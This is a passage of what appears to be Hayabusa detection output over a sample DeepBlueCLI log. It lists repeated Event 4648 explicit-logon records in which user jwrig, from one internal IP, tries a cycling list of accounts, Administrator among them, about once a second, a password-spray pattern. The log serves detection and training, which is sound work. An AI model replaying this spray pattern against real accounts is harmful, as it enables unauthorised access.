Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target 